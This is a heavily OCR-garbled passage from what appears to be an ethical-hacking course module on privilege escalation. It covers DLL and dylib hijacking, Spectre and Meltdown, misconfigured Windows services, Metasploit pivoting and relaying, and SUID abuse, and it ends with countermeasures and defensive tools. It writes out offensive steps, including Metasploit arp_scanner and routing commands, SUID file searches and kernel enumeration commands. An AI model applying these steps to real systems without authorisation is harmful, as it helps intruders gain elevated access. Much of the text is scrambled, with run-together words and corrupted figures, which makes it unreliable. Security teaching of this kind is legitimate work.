(DEP),
whichcan mark
the stackor memoryregionsas non-executable exploitation
to prevent
Implement checking
codepointerintegrity to detectwhethera codepointer
hasbeen
corruptedbeforeitis dereferenced
thecodethoroughly
Scrutinize errors byperforming
to avoidpossible testingand
debugging
ical andCountermensores
Mackin ©by E-Comel
Copyright
Perform
automatedandmanualcodeauditing
Avoid usingunsafefunctionsanduse strncat insteadof strcat andstrncpy
insteadof
strepy
UsetheNXbit to markcertain areas ofmemoryas executable
andnon-executable
Digitally
signthecodebeforelaunching the program
Ensurethatall the controltransfersa re encompassed bya trustedandapproved
code
image
‘Adopt
deep packetinspection (DPI)
fordetecting
remote exploitation
attemptsat the
networkperimeterusingattacksignatures
Consideraltering
the rulesat the operating-system
levelwherethe memorypagescan
holdexecutabledata
UseIDSsolutionsto detectbehaviorthat simulates
a n attack
ical andCountermensores
Mackin ©by E-Comel
Copyright
ModuleFlow
Gaining
A ccess
eC ‘Maintaining
Access:
8 comm
e
Escalating
Privileges
Escalating
privileges
is the second hacking.
stageofsystem Attackers
use passwords
obtainedi n
andthen tryto attain higher-level
thefirst stepto gain access to the targetsystem privileges
in
the system. Thevarious toolsand techniques attackersu se to escalatetheir privileges
are
as
described follows.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Escalation
Privilege
An attacker
be
can gan acces to thenetwork
using2 non-admin
user aecountandthe
nextstp would to gi n
T h eatachr
and
performs
configuration
assocated
that
takes
oversights
appeator
offlaws,
errs,
a rivlege escalation
attack
nthe OSandsoftware
advantagedesign programming bugs,
application
to gainadministrativeaccess to thenetworkandts
These
privileges
allow
attacker
view
ertical/senstve
the
information,
to deletefis, rinstal malicious programs
Escalation
Privilege
Privileges role assigned
are a security to users for using specific programs, features, OSs,
functions,filesor codes,etc., to limit theiraccess bydifferenttypesof users. If a user is
assigned he/she
more privileges, can modify or interact with more restrictedpartsof the
system or application
than lessprivileged users. Attackers initially
gainsystem a ccesswith low
privilegeand then try to gain more privileges to perform activities restrictedfrom less
privileged
users. A privilege
escalationattack is the process of gainingmore privileges
than
were
initially
acquired,
6:75:Example
Figure ofprivilege
eseaation
escalationattack,attackersfirst gain accessto the network usinga non-admin
In a privilege
User account and then try to gain administrativeprivileges. Attackersemploy designflaws,
programming errors, bugs, andconfigurationoversights in the OSand softwareapplication
to
gainadministrative access to thenetworkandits associated applications.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Oncean attacker hasgained accessto a remote system with a validusername and password,
he/she will attemptto escalatethe user account to one with increasedprivileges,
suchas that
of an administrator,to perform restrictedoperations. Theseprivileges allowthe attackerto
view critical/sensitive
information, deletefiles, or installmaliciousprograms suchas viruses,
Trojans,
worms, ete.
of
‘TypesPrivilege
Escalation
Privilege
escalationis required
whenyou want to accessthe system resources that you are not
authorizedto access.Privilege
escalation
takesplacei n two forms:
verticalprivilegeescalation
and
=
horizontal
privilege
escalation.
HorizontalPrivilege Escalation:In a horizontalprivilege
escalation,
the unauthorized
privileges belong andother
user tries to access the resources, functions, that to an
can easilyhas
a ccessuser B'sbankaccount. A
authorizeduser who similaraccess permissions.Forinstance,onlinebanking user
a auser higher
privileges,
tries to gainaccess to the resources andfunctionsof
application banking
or site administrators.
access the site using administrative
Forexample,
functions.
with
someone usingonline
such
can
ical andCountermensores
Mackin ©by E-Comel
Copyright
EscalationUsing
Privilege DLL Hijacking
EscalationUsing
Privilege DLL Hijacking
Most Windowsapplications do not use the fullyqualified pathwhen loading an externalDLL
library;instead, theyfirstsearchthedirectory fromwhichtheyhavebeenloaded. Takingthisas
an advantage, if attackerscan place a maliciousDLLi n the application
directory, the application
will execute themalicious DLLi n place of the realDLL.For example, if an applicationprogram
needslibrary.dll
“exe― (usually in theWindowssystem directory)
to installthe application,
and
failsto specifythe library.dll
path,Windowswill searchfor the DLLi n the directory fromwhich
the application was launched. If an attackerhasalready placed
the DLLin the same directory as
program.exe,
to gainremote accessto thetargetsystem, of
thenthat maliciousDLLwill loadinstead the realDLL, whichallowsthe attacker
Application
Directory
Op.
User
a
pistons aici LL
RealDL requiredby
the exe application
DLLLibrary
‘Windows
Figure6.76: ofprivege
Example OLLjacking
ationusing
ical
Mackin
and Copyright
©
by Countermensores E-Comel
SytemHacking
Attackers andPowerSploit
use toolssuchas Robber to detecthijackable
DLLsandperform
DLL
hijacking
on the target
system:
=
Robber
Source:https://github.com
Robberis an open-sourcetool that helpsattackersto find executablesprone to DLL
hijacking.
an
Attackersuse
DLLhigh
malicious
to
Robber find out whichDLLsare executablerequests
this searchprocess);
absolutepath(triggering
upthe searchpathso it
without
attackerscan then placetheir
getsinvokedbeforethe original
DLL.
Figure
6.7: Screenshot showing
ofRobber injectable
DLs
Module
6 655
Page ical
and ©
Mackin
‘AEN
Promote
Countermensores by E-Comel
Copyright
Reserve.Reproduction
Sty
EscalationbyExploiting
Privilege Vulnerabilities
appication
sits
‘software
Securtyocu
expo
on sch as
Oxtabare
upon
itn /mn secures com] and
plot htps//aam .cm)
EscalationbyExploiting
Privilege Vulnerabilities
Vulnerability is the existenceof a weakness, design flaw,or implementation error that can lead
to an unexpected eventcompromising the security of the system. An attacker employs these
vulnerabilitiesto perform various attackson the confidentiality, availability, or integrityof a
system. The softwaredesign flawsand programmingerrors leadto security vulnerabilities.
Attackersexploit thesesoftwarevulnerabilities, suchas programming flawsi n a programor
service, or within the OS softwareor kernel, to execute maliciouscode.Exploiting software
vulnerabilitiesallowsattackersto execute a commandor binary o n a targetmachineto gain
higher privileges than the existingones or bypass security mechanisms. Attackersusingthese
exploits can even accessprivileged user accountsandcredentials.
There are many publicvulnerability repositories available online that allow access to
informationaboutvarious software
on the OS and software application
(https://www.securityfocus.com)
Exploit
vulnerabilities.Attackerssearch
that
for exploits are based
o n exploit sites such as SecurityFocus
Database (https://www.exploit-db.com)
or and use
theseexploits
to gainhigh
privileges.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Fgure678:Screenshot 08 showing
of Exploit escalationvulneraities
privilege
ical andCountermensores
Mackin ©by E-Comel
Copyright
EscalationUsing
Privilege DylibHijacking 13
¢H
(io
canine
1 amacer
MickScanner
a maius
taht
dyna
detect
one fhe
dye
par ractars,
tht re vuerable
walbeemeted
thnk tack
ipsc
the
aga as
1
Dyno
perm
acters seo sucha s fs hjaeingo
So eo a -—
EscalationUsing
Privilege DylibHijacking
Similarto Windows, OSX is alsovulnerableto dynamic library attacks.OSX provides several
legitimate methods, suchas setting the DYLD_INSERT_LIBRARIES environment variable, which
are user specific.
Thesemethods forcethe loaderto automatically loadmaliciouslibraries into a
DylibHijack
Figure6:79:
Scanner helps
of
Example
attackersto detectdylibs that are
privilege
Dy jacking
using
escalation
vulnerableto hijacking
attacks.
Afteridentifying
vulnerabledylibs, attackersuse tools suchas DylibHijack to performdylib
hijacking
on the targetsystem.
ical andCountermensores
Mackin ©by E-Comel
Copyright
EscalationUsing
Privilege andMeltdown
Spectre
Vulnerabilities
\@
spectre
vlnrabities
design
ofmodem
andmeltdown
are
chip
rom
AMO, found
inthe processor ARM,a nd
_tackers
ad
stesystem
explathesewineries to gl o unauthored
acest ral Information
such
8
Spectre ‘Meltdown
Vulnerability Vulnerability
toeaclaeprvlegesby
unpaged forcing
an
Escalationusing
Privilege andMeltdown Vulnerabilities
Spectre
Spectre
andMeltdownare recent CPUvulnerabilitiesfound i n the design
of modernprocessors,
including
chips
fromAMD,ARM,and Intel,causedbyperformance i n these
optimizations
processors. Attackersmayexploit thesevulnerabilitiesto gain unauthorizedaccessandsteal
criticalsystem suchas login
information credentials, secretkeys,keystrokes,encryption keys,
etc. storedin the application's
memoryto escalateprivileges. Theseattackscan be performed
privileges
becausethe normalverificationof the user’s is disrupted
through the interaction of
featureslike branchprediction,out-of-orderexecution,caching, and speculative execution.
Using thesevulnerabilities,
attackerscan exploit
various IT resources,suchas most OSs, servers,
PCs, cloudsystems, andmobiledevices
=
Spectre Vulnerability
TheSpectre vulnerabilityis found i n many modernprocessors, includingApple,
AMD,
‘ARM,Intel,Samsung, and Qualcomm Thisvulnerability
processors. allowsattackersto
trick a processor into exploitingspeculativeexecution to readrestricteddata.Modern
processors implement speculative execution to predict the futureto completethe
execution faster.For example, if the chipidentifiesthat a program includesmultiple
conditionalstatements,it will start executing and concluding all the possible
outputs
beforethe programdoes.Attackersmayexploit
thisvulnerability
i n differentways:
ical andCountermensores
Mackin ©by E-Comel
Copyright
to takean improperspeculative
featureto forcethe processor decision
andfurther
access dataout of range
‘Attackers to readadjacent
mayuse this vulnerability memorylocationsof a process and
accessinformationfor whichhe/she Thisvulnerability
i s not authorized. helps attackers
to extract confidentialinformation,suchas credentials storedi n the browser,fromthat
targetprocess.In certain cases,usingthis vulnerability, an attackercan even readthe
kernelmemoryor perform a web-based attackusingJavaScript.
MeltdownVulnerability
Meltdownvulnerability
is foundi n all Intel andARMprocessors byApple.
deployed This
vulnerability
allowsattackersto trick a process into accessingout-of-boundsmemory by
exploitingCPUoptimization mechanisms suchas speculativeexecution. Forexample,
an
attackerrequests memory location.He/she
to access an illegal sendsa secondrequest
to reada validmemorylocationconditionally.
In thiscase,a processorusingspeculative
execution will complete
evaluating beforechecking
the resultfor both requests the first
request.Whenthe processorchecksthat the first request it rejectsboth
is invalid,
requests after checkingthe privileges.
Eventhough the processorrejectsboth the
requests,the resultsof both the requests r emain i n the cachememory.Now the
attackersendsmultiplevalid requests
to accessout-of-bounds memorylocations.
may use this vulnerability
‘Attackers to escalateprivileges
byforcing
a n unprivileged
processto readotheradjacent memorylocations,suchas kernelmemoryand physical
informationsuchas credentials,
memory. Thisleadsto criticalsystem privatekeys,
ete.
being
revealed.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Escalationusing Named Pipe
Privilege Impersonation
Escalationusing
Privilege Named Pipe
Impersonation
In WindowsOS,namedpipes are usedto provide legitimatecommunication betweenrunning
In thistechnique,
processes. the messages are exchanged betweenthe processes usinga file.
Forexample, if processA wants to senda message to anotherprocess B,then processA writes
the message
this technique
access
a
to file and processB reads the message
to escalatetheir privileges
privileges.
from that file. Attackersoften exploit
on the victim system to a user account with higher
ical andCountermensores
Mackin ©by E-Comel
Copyright
682: showing
Figure
dump
of
password
of Metasploit
Screenshat hashes
ical andCountermensores
Mackin ©by E-Comel
Copyright
Privilege
EscalationbyExploiting
Misconfigured
Services CEH
‘Unguoted
ServicePaths ServiceObject
Permissions
menecyecteegteaniney
enlting sch
Privilege
EscalationbyExploiting
Misconfigured
Services (Contd) C/E
= I
PrivilegeEscalationbyExploiting
Misconfigured
Services
Attackersgenerally exploitzero-day vulnerabilitiesthat exist i n targetsystems to escalate
privileges.
If attackersare unableto find suchexploits, theytryto escalateprivileges byabusing
misconfigured services in the targetOS.Insecureor improperconfiguration of systemservices
allowsattackersto elevatetheir privileges i n the targetsystem. Forexample, attackersexploit
misconfigured services suchas unquoted service paths,service object unattended
permissions,
installs,modifiableregistryautoruns and configurations,
etc. to elevate access privileges.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Attackers
use toolssuchas Metasploit
to obtainan active sessionwith the targethost.After
establishing to detectmisconfigured
an active session, attackersuse toolssuchas PowerSploit
servicesthat exist in thetargetOS.
roteter
Uploading > pal Power Uppal]
[Upload root PowerSplont/Privesc/Powerip.
7root/Powersploit/Privesc/PowerUp:ps1-->Powerlp-psT
Unquoted
683:Screenshot
Figure
ServicePaths
of Metasploit
showing
shell
access to thetargets ystem
In Windows OSs, whena service starts running,the system attemptsto findthe location
of the executablefileto launchthe service successfully. Generally,the executablepath
is enclosed i n quotation marks so that the system
“", can easilylocatethe application
binary.Someexecutable filesmaynot includequoted paths and include whitespace in
between; in this scenario,the system
thefoldersthat exist i n thepath
with unquoted
paths
to
tries find the application
until the executable
privileges
running underSYSTEM
is found.
binary
Attackers
to elevatethelr privileges.
bysearching
exploit
all
services
Figure684:
Screenshot showing
of Metasploit to detectunquoted
executionofPowerSplot service paths
6
Module Page665 ical andCountermensores
Mackin
©
by E-Comel
Copyright
Service Object
Permissions
misconfigured
‘A service permission mayallowan attackerto modify
or reconfigure the
attributesassociatedwith that service. Thismayeven leadto changing the locationof
the application
binary to a maliciousexecutablecreatedbythe attacker.Byexploiting
suchservices,attackerscan even add new users to the localadministratorgroupi n the
system. Attackersthenhijackthe newaccountto elevatetheir accessprivileges.
AppendData/Addsu
685:of
Figure
Unattended
Screenshot
Installs
Metasploit
showing o f Powersploitto
exeeution
service
detectmisconfigured permision
ical andCountermensores
Mackin ©by E-Comel
Copyright
In Windowssystems, fileis storedin one ofthefollowing
theUnattend.xm! locations:
c:\Windows\Panther\
c:\Windows\Panther\Unattend\
c:\Windows\system32\
C:\Windows
If attackers
\system32\sysprep\
can gainaccessto thisfile,thenthey can easilyobtaincredential information
and configuration settingsusedduring the installationof that service or application
Attackersuse thisinformationto escalateprivileges.
686:of showing
Figure
of detect
Screenshot
Metasploit execution
Powerspolt
to unattended
install
ical andCountermensores
Mackin ©by E-Comel
Copyright
and Relaying
Pivoting to Hack External Machines
therequestsfo acestheresources
‘waytha are comingromthei l y compromised
system
and Relaying
Pivoting to HackExternalMachines(Cont'd)
Ooicovrinehonsinterewok
Pivoting
—_ ©
setup
routings
@
cent
winerbi ries
6
Module 668
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
to HackExternal Machines(Cont'd)
and Relaying
Pivoting
Relaying
1.Setu p portforwarding
rules
(@ Aerackers
canbrowsethe hepserver runningon thetreet
systemu ng the following
URL;
netp://Lecatnost10080
2.Access
thesystom
resources
the following
byexecuting command:
1 amn myadnineiocainost
andRelaying
Pivoting to HackExternalMachines
Pivoting
and relaying
are the techniques
usedto find detailedinformationaboutthe target
network. Thesetechniques are performed
aftersuccessfully
compromisinga targetsystem.The
compromised systemis usedto penetratethe targetnetworkto access other systemsand
resourcesthatare otherwise fromtheattacking
inaccessible network.
In the pivotingtechnique,
onlythe systems through
accessible the compromised systems
are
exploited, whereas i n the relaying technique, the resources accessiblethroughthe
compromised systemare explored Using
or accessed. pivoting,attackers can open a remote
shello n the targetsystemtunneledthrough the initial shello n the compromised system. In
relaying, resourcespresent on theothersystems are accessed through a tunneledshells ession
on the compromised system.
Thefollowing diagrams andrelaying
illustratethe pivoting techniques:
i
6
Figure47:Musrationof pivoting
ical andCountermensores
Mackin ©by E-Comel
Copyright
Detailedexplanation
of andrelaying
the pivoting
688:of
Figure Mustration
relaying
techniques is as follows:
Pivoting
the firstobjective
In this technique, of an attackeris to compromise
a system
to gain a
remote shellon it, andfurther bypass
the firewall to pivotthrough the compromised
systemandgainaccessto theothervulnerablesystems in the network.
Oncethe system is successfully
compromised, a Meterpreter session is established.
As
the session is pivotedthrough the compromised system, the targetsystemcannot
determinethe
Steps
to perform
actual
of
pivoting:
origin the exploitation.
1. Discover
livehostsi n the network
Oncea system is compromised, to discoverthe listof live
an ARPscanis performed
systemsi n the network.
For example,
an attackeruses the following
commandto detectlive hostsi n the
targetnetwork:
> run
post/windows/gather/azp_scanner
RHOSTS<target subnet range>
689:
Figure Screenshoto f Metasploit
ical
resultsof arp_scanner
showing
andCountermensores
Mackin ©by E-Comel
Copyright
shownin the screenshot,
‘As the scan resultsshowseven IP addresses
reachable
from the compromised system.To find out more informationabout these IP
attackers
addresses, perform
portscanning,
. Set up
routing
rules
Priorto using Metasploit
to run portscanner against
a two IPaddresses
i n the target
network, implement
attackers routingrulesto instruct Metasploit
to route all the
traffic destinedto the privatenetwork using the existingMeterpreter session
establishedbetweenthe attacker's
system andthecompromised system.
Forexample,
>
an attacker
background
can
use
the
following this
perform
step: commands
to
. Scanportsof
690:Screenshot
Figure
live systems
of Metasploit
up
setting routingu le
showni n
‘As the result displays
the screenshot, the open portson the private
systems.
ical andCountermensores
Mackin ©by E-Comel
Copyright
xiliary(
10.10.10. 1
ary
fet
RHOST
fet PORTS 1-1004
10.10.10.10
a)
10.10.10:
10.10.10:
10.10, 10.
10.1 TCP OPEN
TCP OPEN
TCPOPEN
10.10.10
R
ts
(100% complete
screenshot
of Metasploit results
showing of port can
4. Exploit vulnerableservices
After the portsare scanned,the vulnerableservices runningon thoseportscan be
exploited.
For example,
an attackercan use BypassUAC
exploitto bypass
the UserAccess
Control(UAC)
setting.
shownin the screenshot,
‘As a successful
sessionis established
to the vulnerable
bypivotingthrough
system a compromised
system.
Figure692: thetargetsytem
Accessing
6
Module 672
Page ical andCountermensores
Mackin ©by E-Comel
Copyright
Relaying
If the pivotingtechnique is unsuccessful,attackersuse the relaying
technique to exploit
vulnerable
‘a systemi n the target network.Attackersuse relayingto access resources
presenton other systems in the targetnetworkvia the compromised systemin sucha
way that the requests to access the resources come from the initially compromised
system.
Steps
to perform
relaying:
1, Set up portforwarding rules
Themain purposeof portforwarding is to allowa user to reacha specific
porton a
system that is not presenton the same network.Theinitially compromisedsystem is
responsiblefor allowing directaccess to the system, whichis otherwiseinaccessible
fromthe attacking system.
Using a Meterpretersession,a listenercan be createdusing a portnumberfrom a
list of open portson the localhost, whichlinksthatlistenerto a port on a remote
server. Thislinking
of portsis knownas portforwarding.
For example, here,the attackerchoseport numbers80,22,and445to set up port
forwarding
rules.
693:Applying
Figure portforwarding
rules
. Accessthe system
resources
ical andCountermensores
Mackin ©by E-Comel
Copyright
1
Other Privilege
EscalationTechniques CEH
Application
rence Shimizu rove
comps ewan heir
Other Privilege
Escalation Techniques
(Cont'd)
‘Setgid wah
seg
‘eran appcaton he etd gts maou cde wih ead
ical andCountermensores
Mackin ©by E-Comel
Copyright
Other Privilege
EscalationTechniques
(Cont'd)
\e Archers
cn sudo
overwritethe confguatinf ile,/ete/susearsw ih ther own maious
(exacts can
ulneabitesattain
superuser aces root eel aces tothe target
tem byexpoingkena
Other Privilege
EscalationTechniques
+
TokenManipulation
Access
In WindowsOSs,
or
associated
access tokensare usedto determinethe security
thread,Thesetokensincludethe access profile
with a process.After a user is authenticated,
context of
(identity
andprivileges)
produces
the system
of a user
an access
a
process
TheWindows
provide
compatibility
application
Compatibility
OSsusea WindowsApplication Framework
calledshims
betweenthe olderand newer versions of Windows.Forexample,
shimming
allowsprogramscreated XP to be compatible
forWindows with
to
Windows10.Shimsprovide a buffer betweenthe programandthe OS.Thisbuffer is
referencedwhena programis executedto verifywhetherthe programrequires access
to the shimdatabase,Whena programneedsto communicate with the OS, the shim
databaseuses API hooking
to redirectthe code.All the shimsinstalledbythe default
Windowsinstaller(sbinst.exe)
are storedat
ical andCountermensores
Mackin ©by E-Comel
Copyright
AWINDIR‘
\AppPatch\sysmain.
hklm\software\microsoft\windows
sdb
nt\currentversion\appeonpatflags\installedsdb
andthey
Shimsrun i n user mode, cannot modify
the kernel.Someof theseshimscan be
usedto bypassUAC(RedirectEXE),
injectmalicious DLLs(InjectDLl),
capturememory
addresses(GetProcAddress),
etc. An attackercan use theseshimsto perform
different
attacksincluding
disabling
WindowsDefender, privilegeescalation, backdoors,
installing
etc.
Filesystem
Permissions
Weakness
Manyprocessesi n the Windows O Ssexecute binaries automatically
as partof their
functionality
or to perform
certain actions. If the filesystempermissions of these
binariesare not set properly,
then the targetbinary file may be replaced with a
maliciousfile,andthe actualprocessc an execute it. If the process that is executing
this
binaryhashigher-level permissions,then the binary also executes under higher-level
permissions,
original
whichmayincludeSYSTEM. Attackerscan exploit
binarieswith maliciousbinaries to escalateprivileges.
technique to manipulateWindowsservice binaries
thistechnique
andself-extracting
to replace
Attackers use this
installers.
PathInterception
is a methodof placing
Pathinterception i n a particular
an executable pathi n sucha way
thattheapplicationwill execute it in placeofthelegitimate target.Attackerscan exploit
severalflawsor misconfigurations to perform pathinterception like unquoted paths
(service
paths
and shortcutpaths),
pathenvironment variable misconfiguration,
and
searchorderhijacking. helps
Pathinterception a n attackerto maintain persistence
on a
systemandescalateprivileges.
Scheduled
Task
TheWindowsOSincludesutilitiessuchas ‘at’
privileges
can use theseutilities i n conjunction user
and‘schtasks.’
A withadministrator
with the TaskSchedulerto schedule
or
programs scripts
remote procedure
that can beexecutedat a particular
properauthentication,he/she
call (RPC).
c an alsoschedule date
and time. Ifa user provides
a taskfrom a remote systemusinga
An attackercan use this technique to execute malicious
programsat systemstartup, perform
maintain persistence, remote execution, escalate
privileges,
etc.
LaunchDaemon
During
the MacOSand OSX booting
process, launchdis executedto complete
the
system-level
systeminitializationprocess.Parametersfor each launch-on-demand
daemonfound i n /System/Library/LaunchDaemons and /Library/LaunchDaemons are
loadedusinglaunchd. Thesedaemons havepropertylistfiles(plist)that are linkedto
executablesthat run at the time of booting. Attackerscan create and install a new
launchdaemon, whichcan beconfigured to execute at boot-uptime usinglaunchd or
launchetlto load plistinto the relevantdirectories.Theweakconfigurations allow an
ical andCountermensores
Mackin ©by E-Comel
Copyright
attackerto alter theexisting
launchdaemon’s
executable
to maintain persistence
or to
escalateprivileges.
PlistModification
In MacOS and0SX,plist(property list)filesincludeallthenecessaryinformationthatis
neededto configure applicationsand services. Thesefiles describewhen programs
shouldexecute,theexecutable filepath, programparameters, essential
OSpermissions,
etc. The plistfiles are stored at specific locationslike /Library/Preferences
(which
executewith high-level privileges)and~/Library/Preferences (whichexecutewith user
privileges).
Attackerscan accessandalter theseplistfilesto execute maliciouscodeon
behalfof a legitimate user, andfurther use them as a persistence mechanism and to
escalateprivileges.
SetuidandSetgid
In Linux and MacOS, uses setuidor setgid,
if an application the application
will execute
withthe privileges Generally,
of the owninguser or group,respectively. the applications
un privileges.
underthe current user’s Thereare certain circumstances wherethe
programsmust beexecuted with elevatedprivileges but the user runningthe program
doesnot needthe elevatedprivileges.
In this scenario,one can set the setuidor setgid
flags
fortheir applications.
An attacker can exploitthe applications withthesetuidor
setgid
flags codewith elevatedprivileges.
to execute malicious
WebShell
web shelli s a web-based
‘A scriptthat allowsaccessto a
createdin all OSslike Windows,
injecta malicious
Linux, MacOS, web
X.server.
shellsWeb can be
andOS Attackerscreate webshellsto
scripton a web server to maintain persistentaccessand escalate
privileges.
Attackersusea webshellas a backdoorto gain accessandcontrola remote
server. Generally, a webshellruns underthe current user'sprivileges.
Usinga web shell,
an attackercan perform privilegeescalationbyexploitinglocalsystemvulnerabilities.
After escalating privileges,an attackercan install malicioussoftware,change user
ical andCountermensores
Mackin ©by E-Comel
Copyright
‘Abusing
SUIDandSGIDPermissions
SetUserIdentification(SUID) Identification(SGID)
andSetGroup are accesspermissions
given to a programfile inUNIX-basedsystems. Thesepermissions usually
allow the
users on the systemto run @ programwith temporarilyelevatedprivilegesor root
privileges
to execute a task.Thefiles with SUID and SGID rights
particular run with
higherprivileges.
In Linux, andbinariesthat can be executedbythe attackers
there are some commands
to elevatetheirprivileges
from non-root users to root users, if flags
of SUIDand SGID
rightsare set. Someof the executablecommandsthat can be usedbyattackersto
spawna shellandescalateprivilegesare Nmap, vim, less, more, Bash, Cat, cp, echo,
find, Nano, etc.
Attackerscan use the followingcommands to find SUID and SGID files i n the target
system:
# FindSUID
find / -perm -u=s -type £2>/dev/null
Find GUID
find / -perm -g=s
-type £2>/dev/null
KernelExploit
Kernelexploitsreferto
execute arbitrary
commands
kernelvulnerabilities,
programs
exploit
vulnerabilities
that can
to
or codewith higher
attackers
privileges.
i n thekernel
present
Bysuccessfully
can attain superuseror root-level
exploiting
accessto the target
system.To run a kernelexploit,attackersmust have configurationdetailsof the target
system.
use the following
‘Attackers commands to obtaindetailssuchas the OS,kernelversion,
andarchitectureof the targetsystem:
#08
#
cat
Kernel
version
/etc/issue
# Architecture
cat /proc/version
Attackerssearchhttps://www.exploit-db.com
and execute Python
scriptssuch as
linprivchecker.py forescalating
to detectkernelexploits privileges.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Escalation Tools
Privilege CEH
EscalationTools
Privilege
Privilege
escalationtools suchas BeRoot,
to run a configuration
attackers
underlyingvulnerabilities,
assessment
linpostexp,
services,file anddirectory
Windows
Exploit
Suggester,
systemto find information
on a target
etc. allow
aboutthe
permissions,kernelversion, architecture,
etc. Usingthis information,attackerscan further find a way to exploit and elevatetheir
privileges
on the targetsystem.
=
BeRoot
Source:https://aithub.com
BeRooti s a post-exploitation c ommon misconfigurations
tool to check to finda wayto
escalateprivilege.
shownin the
‘As screenshot,
usingthis tool,attackerscan obtain informationabout
service writeabledirectories
permissions, with their locations,
permissionson startup
keys,
ete.
ical andCountermensores
Mackin ©by E-Comel
Copyright
694:
Figure Screenshot
of Boot showing
service permissions
ical andCountermensores
Mackin ©by E-Comel
Copyright
+
linpostexp
6
Figure95:Screenshot
ofBeRoot
showing
Startup and Taskscheduler
keys permissions
Source:https://github.com
The linpostexptool obtainsdetailedinformationo n the kernel,
whichcan be usedto
escalateprivileges
on the targetsystem,
showni n the screenshot,
‘As using this tool,attackerscan obtaininformationaboutthe
kernel,filesystems,superuser,sudoers, sudoversion, etc, Attackerscan use this
informationto exploitvulnerabilitiespresenti n the kernelto elevatetheir privileges.
Thefollowing commandis used to extract this informationaboutthe targetsystem:
python linprivchecker.py
ical andCountermensores
Mackin ©by E-Comel
Copyright
ure
6 of
97:Screenshot showing
linpostexp user, andenvironmental
lesystem, info
6
Module 682
Page tical andCountermensores
Making Copyright©
by Comet
How to DefendAgainst Escalation
Privilege
FEBneteracve logon
esc prises senstie
ata,
run sericesas
frapplleation
bugs coding
eros
unpaged
erege accounts Testhesstem
and hero
aprvlege
ofseparation
Implement
{olimtthespe
methodloey
nd
pogrommingerros Regular theernel
and update
pateh
i}
How to Defend Against
Privilege
Escalation (Cont'd)
C/EH
cn he
et Coleg
[: eceeteraieeieeaed
ical
ofan
privilege administrator.
andCountermensores ©
Mackin by E-Comel
Copyright
The
following
=
are thebestcountermeasuresto defend
Restrictinteractive logon
privileges
against
escalation:
privilege
‘=
Runusers andapplications
withthe lowestprivileges
+
Implement multi-factorauthenticationandauthorization
Runservicesas unprivilegedaccounts
Implement a privilege
separationmethodology to limit thescopeof programming
e rrors
andbugs
technique
Usean encryption to protectsensitive data
Reducetheamount ofcodethat runs witha particularprivilege
Performdebugging
usingboundscheckers
andstresstests
for application
Testthe system coding
errors andbugs
thoroughly
Regularly
patchandupdate
the kernel
Change to “Always
UACsettings Notify,―
so that it increases the visibility
of the user
whenUACelevationis requested
filesto thesearchpaths
Restrictusers fromwriting for applications
Continuously monitor
filesystem
theprivileges
Reduce
usingauditing
permissions tools
of user accountsandgroupsso thatonlylegitimate
administrators
canmakeservice changes
Use whitelistingtools to identify and block malicioussoftwarethat changes
file,
directory,
or service permissions
Usefullyqualifiedpathsi n all Windowsapplications
Ensurethatall executables
are placed
i n write-protected
directories
plistfilesfrombeing
in Mac 05s,prevent alteredbyusers bymaking
themread-only
Blockunwantedsystem
utilitiesor software
that maybeusedto scheduletasks
Regularly
patch
andupdate
theweb servers
+
=
Disable
default
local
Detect,
oraccount
the administrator
repair,andfix anyflaws errors runningi n the system
services
Defendagainstabusing sudorights:
Implementa strongpassword forsudousers
policy
=
Turnoff password caching bysettingthe timestamp_timeout to 0, so that everytime
sudois executedusers must inputtheir password
Separate sudo-leveladministrativeaccountsfromthe administrator's regular
accounts,
to preventstealing
of sensitive passwords
ical andCountermensores
Mackin ©by E-Comel
Copyright
=
Update andaccountsat regular
user permissions intervals
‘=
Testsudouserswith accessto programs
containing for arbitrary
parameters code
execution
Module
6 68S
Page tical andCountermensores
Making Copyright©
by Comet
Toolsfor Defending
againstDLL and DylibHijacking
Dependency
Walker DylibHijackScanner
13
¢H
|@ Oy jac Scanner
simple
that
ty wl san your
ical andCountermensores
Mackin ©by E-Comel
Copyright
Dependency Walker
Source:http://www.dependencywalker.com
DependencyWalkeris usefulfor troubleshooting
systemerrors relatedto loading
and
modules.It detectsmanycommon application
executing problems, suchas missing
modules, invalidmodules, import/export
mismatches,
circulardependency errors, etc.
showni n the
‘As screenshot, professionals
cybersecurity use Dependency Walkerto
verifyall the DLLsusedbyan application, the locationfromwhichDLLsare loaded,
missingDLLs, etc. Thisinformationhelps professionals
security to detect,patch,andfix
misconfigured
DLLsi n the systems.
[re At
Atlan
[Waring itone
eqared
onengl
dyor
orwarded
iad dependency
mse ws
war
otwt
ose
dependency
To
698:
Figure Screenshot
of Dependency
Walker
ical andCountermensores
Mackin ©by E-Comel
Copyright
*
_Dylib
HijackScanner
Source:https://objective-see.com
DylibHijackScanner(DHS)
is a simpleutilitythat will scan your computerfor
applications
thatare eithersusceptible
to dylib
hijacking
or havebeenhijacked.
showni n the screenshot,
‘As securityprofessionals
use DHSto detectapplications
that
havebeenhijacked or are vulnerableto dylib
hijacking.
Thisinformationhelps
them to
patchandfixtheseapplications
699: Scanner
Figure Screenshot
of Oylis
Hijack
Module
6 688
Page ical
and ©
Mackin Countermensores
Copyright
by E-Comel
andMeltdownVulnerabilities
againstSpectre
Defending
Au pth verb
sotvare
a ach towne
occ
s erves
andpins tt sow speed
ero
Eh 00s reve ston pee age ofca nomatin fom rene menay
Defending
against andMeltdown Vulnerabilities
Spectre
Variouscountermeasures to defend privilege
escalationattacksthat exploitSpectre
Meltdown
vulnerabilities
as
follows: are
Regularly
‘=
=
OSs
and
monitoring
of
andupdate
patch
applications
services
Enablecontinuous
firmware
critical and runningon the system
andnetwork
Regularly
patchvulnerable
software
suchas browsers
Installandupdate
ad-blockers
andanti-malwaresoftwareto blockinjection
of malware
through
compromised
websites
Enabletraditionalprotectionmeasures suchas endpoint
securitytools to prevent
unauthorized
system access
Blockservices andapplications
that allowunprivileged
users to execute code
Never installunauthorized
softwareor access untrustedwebsitesfrom systems
storing
sensitive information
Usedatalossprevention(DLP)
solutionsto preventleakage
of criticalinformationfrom
runtime memory
checkwith the manufacturer
Frequently for BIOSupdates
and followthe instructions
provided
to
bythe manufacturer installthe updates
ical andCountermensores
Mackin ©by E-Comel
Copyright
and Meltdown Vulnerabilities
Spectre
Tools for Detecting
